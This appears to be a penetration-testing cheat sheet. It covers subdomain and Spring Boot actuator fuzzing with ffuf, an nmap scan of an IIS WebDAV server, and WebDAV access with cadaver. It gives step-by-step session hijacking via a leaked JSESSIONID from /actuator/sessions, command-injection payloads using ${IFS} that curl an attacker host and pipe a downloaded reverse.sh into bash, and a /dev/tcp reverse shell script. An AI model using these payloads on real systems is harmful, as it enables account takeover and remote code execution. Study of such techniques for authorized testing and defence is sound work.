- robots.txt
- sitemap.xml
# Command : ffuf -w <wordlist> -u http://<host>.fr/ -H 'Host: FUZZ.<host>.fr' -fs 15949
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomainstop100000.txt -u http://mywebsite.fr/ -H 'Host: FUZZ.mywebsite.fr' -fs 15949
Check a random page that does not exist as example /qmdkgjrot12dfgg. If the error page return "WhiteLabel Error Page", it's means that the Spring Boot framework is used.
| endpoint | Description |
|---|---|
| /actuator | |
| /actuator/sessions | List all the active sessions and their session ids |
| /actuator/beans | |
| /actuator/health | |
| /actuator/env | |
| /actuator/mappings | This provides a detailed overview of all the mappings configured in the application. On browsing to the endpoint, we see a JSON response containing information about the request mappings in place, including the requests' methods (GET,POST,etc.) |
known specific wordlist : /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://mywebsite.com/FFUZ -ic -t 10
We see the session identifier, which we can grab and set as a cookie in our browser, using the developer console's Storage tab.
Important note: Sometimes firefox does not allow to add directly in cookies session, consequently, try to add into local storage or session storage. In addition, think to rename the name into JSESSIONID.
Once the session identifier add, try to access to the authenticated user or admin webpags (e.g. /admin, /console, etc.).
Important note: Sometimes the session identifier is expired. In this case, reload the /actuator/sessions page, take a new session identifier then modify it into the developer console's storage tab.
Nmap scan report for 10.0.0.1
Host is up, received user-set (0.085s latency).
Scanned at 2022-07-17 10:38:57 PDT for 344s
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Date: Sun, 17 Jul 2022 17:43:57 GMT
|_ Server Type: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
cadaver http://10.0.0.1
username : kiosec
password:
dav:>
Often the field does not accept white spaces, so to bypass this we can use ${IFS} as a delimiter, which is a special shell variable that stands for Internal Field Separator and defaults to a space (followed by a tab and a newline) in shells like Bash and sh.
Example of command injection using ${IFS} as a delimiter.
#Think to execute 'python -m http.server 4444' on the attacker side before
test;curl${IFS}http://10.0.0.1:4444; => try to acconect to the attacker server
test;curl${IFS}http://10.10.0.1:4444/reverse.sh|bash; => try to connect to the attacker server, donwload a reverse shell (reverse.sh) then execute it using bash.
#Example of revershe shell generation in the shell
#echo -e '#!/bin/bash\nsh -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > reverse.sh
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.0.0.1/4449 0>&1' > reverse.sh